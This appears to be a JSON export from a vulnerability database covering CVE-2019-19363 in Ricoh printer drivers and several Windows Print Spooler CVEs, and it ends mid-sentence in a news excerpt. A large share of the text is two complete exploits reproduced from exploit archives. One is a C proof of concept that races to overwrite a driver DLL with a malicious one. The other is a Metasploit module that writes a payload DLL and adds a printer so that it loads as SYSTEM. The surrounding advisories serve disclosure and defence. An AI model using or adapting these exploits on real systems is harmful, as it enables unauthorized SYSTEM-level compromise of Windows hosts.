cbOffset);\n\n } while (cbOffset);\n\n // Reissue the watch command\n ReadDirectoryChangesW(di->hDir, di->lpBuffer, MAX_BUFFER, TRUE, dwNotifyFilter, &di->dwBufLength, &di->Overlapped, NULL);\n }\n } while (di);\n}\n\nvoid WINAPI InstallPrinter() {\n WCHAR cmd_buf[1000];\n swprintf(cmd_buf, sizeof(cmd_buf), L\"/c rundll32 printui.dll, PrintUIEntry /if /b \\\"Printer\\\" /r lpt1: /m \\\"%s\\\"\", PrinterName);\n wprintf(L\"+ Adding printer: %s\\n\", cmd_buf);\n\n unsigned long ret = (unsigned long) ShellExecuteW(0, L\"open\", L\"cmd\", cmd_buf, NULL, SW_HIDE);\n if(ret <= 32) // That seems to be the way to handle ShellExecuteW's ret value.\n wprintf(L\"+ Failed launching command. Return value is %d\\n\", ret);\n}\n\nvoid WINAPI WatchDirectories(HANDLE hCompPort) {\n DWORD tid;\n HANDLE hThread;\n\n ReadDirectoryChangesW(DirInfo.hDir, DirInfo.lpBuffer, MAX_BUFFER, TRUE, dwNotifyFilter, &DirInfo.dwBufLength, &DirInfo.Overlapped, NULL);\n\n // Create a thread to sit on the directory changes\n hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)HandleDirectoryChange, hCompPort, 0, &tid);\n\n // Just loop and wait for the user to quit\n InstallPrinter();\n while (_getch() != 'q');\n\n // The user has quit - clean up\n PostQueuedCompletionStatus(hCompPort, 0, 0, NULL);\n\n // Wait for the Directory thread to finish before exiting\n WaitForSingleObject(hThread, INFINITE);\n CloseHandle(hThread);\n}\n\n\nint wmain(int argc, WCHAR *argv[]) {\n HANDLE hCompPort = NULL; // Handle To a Completion Port\n\n if (argc == 6) {\n PrinterName = argv[1];\n TargetDllFullFilePath = argv[2];\n TargetDLLRelFilePath = argv[3];\n MaliciousLibraryFile = argv[4];\n change_counter = _wtoi(argv[5]);\n }\n else {\n wprintf(L\"+ Usage: %s <printer_name> <fullpath_monitor_dll> <rel_path_monitor_dll> <new_dll> <counter>\\n\", argv[0]);\n return 0;\n }\n wprintf(L\"+ Monitoring directory %s\\n\", BaseDirName);\n\n // Get a handle to the directory\n DirInfo.hDir = CreateFile(BaseDirName,\n FILE_LIST_DIRECTORY,\n FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n NULL,\n OPEN_EXISTING,\n FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OVERLAPPED,\n NULL);\n\n if (DirInfo.hDir == INVALID_HANDLE_VALUE) {\n wprintf(L\"Unable to open directory %s. GLE=%ld. Terminating...\\n\",\n BaseDirName, GetLastError());\n return 0;\n }\n\n lstrcpy(DirInfo.lpszDirName, BaseDirName);\n\n if (HANDLE hFile = CreateFile(TargetDllFullFilePath,\n GENERIC_WRITE,\n FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n NULL,\n CREATE_ALWAYS,\n FILE_ATTRIBUTE_NORMAL,\n NULL)) {\n wprintf(L\"+ File %s created\\n\", TargetDllFullFilePath);\n CloseHandle(hFile);\n }\n else\n wprintf(L\"+ File %s could not be created\\n\", TargetDllFullFilePath);\n\n\n if ((hCompPort = CreateIoCompletionPort(DirInfo.hDir, hCompPort, (ULONG_PTR)&DirInfo, 0)) == NULL) {\n wprintf(L\"+ CreateIoCompletionPort() failed.\\n\");\n return 0;\n }\n\n wprintf(L\"+ Press <q> to exit\\n\");\n\n // Start watching\n WatchDirectories(hCompPort);\n\n CloseHandle(DirInfo.hDir);\n CloseHandle(hCompPort);\n return 1;\n}\n", "sourceHref": "https://0day.today/exploit/33859", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "jvn": [{"lastseen": "2023-05-29T16:25:45", "description": "Multiple RICOH printer drivers contain a privilege escalation vulnerability.\n\n ## Impact\n\nIf a user who can login to the computer where the affected printer driver is installed uses the specially crafted printer driver, that may result in administrative privileges being taken by privilege escalation.\n\n ## Solution\n\n**Apply the Patch** \nApply the approriate patch according to the information provided by the developer.\n\n ## Products Affected\n\nA wide range of the products is affected. \nFor more information, refer to the [information provided by the developer](<https://www.ricoh.com/info/2020/0122_1/list>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-25T00:00:00", "type": "jvn", "title": "JVN#15697526: Privilege escalation vulnerability in multiple RICOH printer drivers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19363"], "modified": "2020-02-25T00:00:00", "id": "JVN:15697526", "href": "http://jvn.jp/en/jp/JVN15697526/index.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2023-05-29T16:24:30", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-10T00:00:00", "type": "exploitdb", "title": "Ricoh Driver - Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-19363", "CVE-2019-19363"], "modified": "2020-02-10T00:00:00", "id": "EDB-ID:48036", "href": "https://www.exploit-db.com/exploits/48036", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/exe'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Post::Windows::Priv\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Ricoh Driver Privilege Escalation',\n 'Description' => %q(\n Various Ricoh printer drivers allow escalation of\n privileges on Windows systems.\n\n For vulnerable drivers, a low-privileged user can\n read/write files within the `RICOH_DRV` directory\n and its subdirectories.\n\n `PrintIsolationHost.exe`, a Windows process running\n as NT AUTHORITY\\SYSTEM, loads driver-specific DLLs\n during the installation of a printer. A user can\n elevate to SYSTEM by writing a malicious DLL to\n the vulnerable driver directory and adding a new\n printer with a vulnerable driver.\n\n This module leverages the `prnmngr.vbs` script\n to add and delete printers. Multiple runs of this\n module may be required given successful exploitation\n is time-sensitive.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Alexander Pudwill', # discovery & PoC\n 'Pentagrid AG', # PoC\n 'Shelby Pace' # msf module\n ],\n 'References' =>\n [\n [ 'CVE', '2019-19363'],\n [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']\n ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Platform' => 'win',\n 'Payload' =>\n {\n },\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' =>\n [[\n 'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }\n ]],\n 'Notes' =>\n {\n 'SideEffects' => [ ARTIFACTS_ON_DISK ],\n 'Reliability' => [ UNRELIABLE_SESSION ],\n 'Stability' => [ SERVICE_RESOURCE_LOSS ]\n },\n 'DisclosureDate' => \"Jan 22 2020\",\n 'DefaultTarget' => 0\n ))\n\n self.needs_cleanup = true\n\n register_advanced_options([\n OptBool.new('ForceExploit', [ false, 'Override check result', false ])\n ])\n end\n\n def check\n dir_name = \"C:\\\\ProgramData\\\\RICOH_DRV\"\n\n return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name)\n driver_names = dir(dir_name)\n\n return CheckCode::Detected(\"Detected Ricoh driver directory, but no installed drivers\") unless driver_names.length\n\n vulnerable = false\n driver_names.each do |driver_name|\n full_path = \"#{dir_name}\\\\#{driver_name}\\\\_common\\\\dlz\"\n next unless directory?(full_path)\n @driver_path = full_path\n\n res = cmd_exec(\"icacls \\\"#{@driver_path}\\\"\")\n next unless res.include?('Everyone:')\n next unless res.match(/\\(F\\)/)\n\n vulnerable = true\n break\n end\n\n return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable\n\n vprint_status(\"Vulnerable driver directory: #{@driver_path}\")\n CheckCode::Appears('Ricoh driver directory has full permissions')\n end\n\n def add_printer(driver_name)\n fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)\n\n dll_data = generate_payload_dll\n dll_path = \"#{@driver_path}\\\\headerfooter.dll\"\n\n temp_path = expand_path('%TEMP%\\\\headerfooter.dll')\n vprint_status(\"Writing dll to #{temp_path}\")\n\n bat_file_path = expand_path(\"%TEMP%\\\\#{Rex::Text.rand_text_alpha(5..9)}.bat\")\n cp_cmd = \"copy /y \\\"#{temp_path}\\\" \\\"#{dll_path}\\\"\"\n bat_file = <<~HEREDOC\n :repeat\n #{cp_cmd} && goto :repeat\n HEREDOC\n\n write_file(bat_file_path, bat_file)\n write_file(temp_path, dll_data)\n register_files_for_cleanup(bat_file_path, temp_path)\n\n script_cmd = \"cscript \\\"#{@script_path}\\\" -a -p \\\"#{@printer_name}\\\" -m \\\"#{driver_name}\\\" -r \\\"lpt1:\\\"\"\n bat_cmd = \"cmd.exe /c \\\"#{bat_file_path}\\\"\"\n print_status(\"Adding printer #{@printer_name}...\")\n client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })\n vprint_status(\"Executing script...\")\n cmd_exec(bat_cmd)\n rescue Rex::Post::Meterpreter::RequestError => e\n e_log(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n end\n\n def exploit\n fail_with(Failure::None, 'Already running as SYSTEM') if is_system?\n\n fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'\n\n if sysinfo['Architecture'] != payload.arch.first\n fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')\n end\n\n @driver_path = ''\n unless check == CheckCode::Appears || datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override')\n end\n\n @printer_name = Rex::Text.rand_text_alpha(5..9)\n @script_path = \"C:\\\\Windows\\\\System32\\\\Printing_Admin_Scripts\\\\en-US\\\\prnmngr.vbs\"\n drvr_name = @driver_path.split('\\\\')\n drvr_name_idx = drvr_name.index('RICOH_DRV') + 1\n drvr_name = drvr_name[drvr_name_idx]\n\n add_printer(drvr_name)\n end\n\n def cleanup\n print_status(\"Deleting printer #{@printer_name}\")\n Rex.sleep(3)\n delete_cmd = \"cscript \\\"#{@script_path}\\\" -d -p \\\"#{@printer_name}\\\"\"\n client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })\n end\nend", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/windows/local/48036.rb", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-29T16:24:33", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-22T00:00:00", "type": "exploitdb", "title": "Ricoh Printer Drivers - Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-19363", "CVE-2019-19363"], "modified": "2020-01-22T00:00:00", "id": "EDB-ID:47962", "href": "https://www.exploit-db.com/exploits/47962", "sourceData": "/*\n\nThis proof of concept code monitors file changes on Ricoh's driver DLL files and overwrites\na DLL file before the library is loaded (CVE-2019-19363).\n\nWritten by Pentagrid AG, 2019.\n\nCf. https://pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/\n\nCredits: Alexander Pudwill\n\nThis proof of concept code is based on the ReadDirectoryChangesW API call to\nget notified about changes on files and directories and reuses parts from the example from\nhttps://www.experts-exchange.com/questions/22507220/ReadDirectoryChangesW-FWATCH-MSDN-sample-not-working.html\n\n*/\n#include <stdio.h>\n#include <stdlib.h>\n#include <conio.h>\n#include <windows.h>\n\n#define MAX_BUFFER 4096\n\nint change_counter = 0;\nconst WCHAR * const BaseDirName = L\"C:\\\\ProgramData\";\nconst WCHAR * TargetDllFullFilePath, * TargetDLLRelFilePath, * MaliciousLibraryFile, * PrinterName;\nDWORD dwNotifyFilter = FILE_NOTIFY_CHANGE_LAST_WRITE |\n FILE_NOTIFY_CHANGE_SIZE |\n FILE_NOTIFY_CHANGE_LAST_ACCESS |\n FILE_NOTIFY_CHANGE_CREATION;\n\ntypedef struct _DIRECTORY_INFO {\n HANDLE hDir;\n TCHAR lpszDirName[MAX_PATH];\n CHAR lpBuffer[MAX_BUFFER];\n DWORD dwBufLength;\n OVERLAPPED Overlapped;\n} DIRECTORY_INFO, *PDIRECTORY_INFO, *LPDIRECTORY_INFO;\n\nDIRECTORY_INFO DirInfo;\n\nvoid WINAPI HandleDirectoryChange(DWORD dwCompletionPort) {\n DWORD numBytes, cbOffset;\n LPDIRECTORY_INFO di;\n LPOVERLAPPED lpOverlapped;\n PFILE_NOTIFY_INFORMATION fni;\n WCHAR FileName[MAX_PATH];\n\n do {\n\n GetQueuedCompletionStatus((HANDLE)dwCompletionPort, &numBytes, (LPDWORD)&di, &lpOverlapped, INFINITE);\n\n if (di) {\n fni = (PFILE_NOTIFY_INFORMATION)di->lpBuffer;\n\n do {\n cbOffset = fni->NextEntryOffset;\n\n // get filename\n size_t num_elem = fni->FileNameLength / sizeof(WCHAR);\n if (num_elem >= sizeof(FileName) / sizeof(WCHAR)) num_elem = 0;\n\n wcsncpy_s(FileName, sizeof(FileName)/sizeof(WCHAR), fni->FileName, num_elem);\n FileName[num_elem] = '\\0';\n wprintf(L\"+ Event for %s [%d]\\n\", FileName, change_counter);\n\n if (fni->Action == FILE_ACTION_MODIFIED) {\n\n if (!wcscmp(FileName, TargetDLLRelFilePath)) {\n\n if (change_counter > 0)\n change_counter--;\n if (change_counter == 0) {\n change_counter--;\n\n if (CopyFile(MaliciousLibraryFile, TargetDllFullFilePath, FALSE))\n wprintf(L\"+ File %s copied to %s.\\n\", MaliciousLibraryFile, TargetDllFullFilePath);\n\n else {\n wchar_t buf[256];\n\n FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,\n NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),\n buf, (sizeof(buf) / sizeof(wchar_t)), NULL);\n\n wprintf(L\"+ Failed to copy file %s to %s: %s\\n\", MaliciousLibraryFile, TargetDllFullFilePath, buf);\n }\n\n exit(1);\n } // end of trigger part\n }\n } // eo action mod\n fni = (PFILE_NOTIFY_INFORMATION)((LPBYTE)fni + cbOffset);\n\n } while (cbOffset);\n\n // Reissue the watch command\n ReadDirectoryChangesW(di->hDir, di->lpBuffer, MAX_BUFFER, TRUE, dwNotifyFilter, &di->dwBufLength, &di->Overlapped, NULL);\n }\n } while (di);\n}\n\nvoid WINAPI InstallPrinter() {\n WCHAR cmd_buf[1000];\n swprintf(cmd_buf, sizeof(cmd_buf), L\"/c rundll32 printui.dll, PrintUIEntry /if /b \\\"Printer\\\" /r lpt1: /m \\\"%s\\\"\", PrinterName);\n wprintf(L\"+ Adding printer: %s\\n\", cmd_buf);\n\n unsigned long ret = (unsigned long) ShellExecuteW(0, L\"open\", L\"cmd\", cmd_buf, NULL, SW_HIDE);\n if(ret <= 32) // That seems to be the way to handle ShellExecuteW's ret value.\n wprintf(L\"+ Failed launching command. Return value is %d\\n\", ret);\n}\n\nvoid WINAPI WatchDirectories(HANDLE hCompPort) {\n DWORD tid;\n HANDLE hThread;\n\n ReadDirectoryChangesW(DirInfo.hDir, DirInfo.lpBuffer, MAX_BUFFER, TRUE, dwNotifyFilter, &DirInfo.dwBufLength, &DirInfo.Overlapped, NULL);\n\n // Create a thread to sit on the directory changes\n hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)HandleDirectoryChange, hCompPort, 0, &tid);\n\n // Just loop and wait for the user to quit\n InstallPrinter();\n while (_getch() != 'q');\n\n // The user has quit - clean up\n PostQueuedCompletionStatus(hCompPort, 0, 0, NULL);\n\n // Wait for the Directory thread to finish before exiting\n WaitForSingleObject(hThread, INFINITE);\n CloseHandle(hThread);\n}\n\n\nint wmain(int argc, WCHAR *argv[]) {\n HANDLE hCompPort = NULL; // Handle To a Completion Port\n\n if (argc == 6) {\n PrinterName = argv[1];\n TargetDllFullFilePath = argv[2];\n TargetDLLRelFilePath = argv[3];\n MaliciousLibraryFile = argv[4];\n change_counter = _wtoi(argv[5]);\n }\n else {\n wprintf(L\"+ Usage: %s <printer_name> <fullpath_monitor_dll> <rel_path_monitor_dll> <new_dll> <counter>\\n\", argv[0]);\n return 0;\n }\n wprintf(L\"+ Monitoring directory %s\\n\", BaseDirName);\n\n // Get a handle to the directory\n DirInfo.hDir = CreateFile(BaseDirName,\n FILE_LIST_DIRECTORY,\n FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n NULL,\n OPEN_EXISTING,\n FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OVERLAPPED,\n NULL);\n\n if (DirInfo.hDir == INVALID_HANDLE_VALUE) {\n wprintf(L\"Unable to open directory %s. GLE=%ld. Terminating...\\n\",\n BaseDirName, GetLastError());\n return 0;\n }\n\n lstrcpy(DirInfo.lpszDirName, BaseDirName);\n\n if (HANDLE hFile = CreateFile(TargetDllFullFilePath,\n GENERIC_WRITE,\n FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n NULL,\n CREATE_ALWAYS,\n FILE_ATTRIBUTE_NORMAL,\n NULL)) {\n wprintf(L\"+ File %s created\\n\", TargetDllFullFilePath);\n CloseHandle(hFile);\n }\n else\n wprintf(L\"+ File %s could not be created\\n\", TargetDllFullFilePath);\n\n\n if ((hCompPort = CreateIoCompletionPort(DirInfo.hDir, hCompPort, (ULONG_PTR)&DirInfo, 0)) == NULL) {\n wprintf(L\"+ CreateIoCompletionPort() failed.\\n\");\n return 0;\n }\n\n wprintf(L\"+ Press <q> to exit\\n\");\n\n // Start watching\n WatchDirectories(hCompPort);\n\n CloseHandle(DirInfo.hDir);\n CloseHandle(hCompPort);\n return 1;\n}", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/windows/local/47962.c", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:18", "description": "A remote code execution vulnerability exists in Microsoft Windows. Successful exploitation could result in execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-28T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Remote Code Execution (CVE-2020-1300)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1300"], "modified": "2020-10-28T00:00:00", "id": "CPAI-2020-1058", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2023-05-30T14:37:26", "description": "A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files.\n\nTo exploit the vulnerability, an attacker would have to convince a user to either open a specially crafted cabinet file or spoof a network printer and trick a user into installing a malicious cabinet file disguised as a printer driver.\n\nThe update addresses the vulnerability by correcting how Windows handles cabinet files.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T07:00:00", "type": "mscve", "title": "Windows Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1300"], "modified": "2020-06-09T07:00:00", "id": "MS:CVE-2020-1300", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1300", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T16:35:57", "description": "A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\n**UPDATE** August 10, 2021: Microsoft has completed the investigation and has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. This security update changes the Point and Print default behavior; please see [KB5005652](<https://support.microsoft.com/help/5005652>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-15T07:00:00", "type": "mscve", "title": "Windows Print Spooler Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481"], "modified": "2021-08-10T07:00:00", "id": "MS:CVE-2021-34481", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34481", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cnvd": [{"lastseen": "2022-11-05T06:49:45", "description": "Microsoft Windows Print Spooler is a print backend processor component of Microsoft Corporation (USA).A remote code execution vulnerability exists in Microsoft Windows Print Spooler, which can be exploited by attackers to run arbitrary code with SYSTEM privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-19T00:00:00", "type": "cnvd", "title": "Microsoft Windows Print Spooler Remote Code Execution Vulnerability (CNVD-2022-10026)", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481"], "modified": "2022-02-14T00:00:00", "id": "CNVD-2022-10026", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-10026", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-08-18T09:20:53", "description": "# CVE-2021-34481\nCheck patch for CV...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T16:56:10", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481"], "modified": "2021-08-11T17:01:18", "id": "5E52E412-B5BA-54D6-92C1-F70C151A8199", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "thn": [{"lastseen": "2022-05-09T12:39:19", "description": "[](<https://thehackernews.com/images/-bi5ZcqZAriI/YPUgr-nwSjI/AAAAAAAADPc/Vyz_FgNnVwEF-E_EP0oMclWiGQCCSplZACLcBGAsYHQ/s0/Windows-Printer-Spooler-Vulnerability.jpg>)\n\nMerely days after Microsoft sounded the alarm on an [unpatched security vulnerability](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>) in 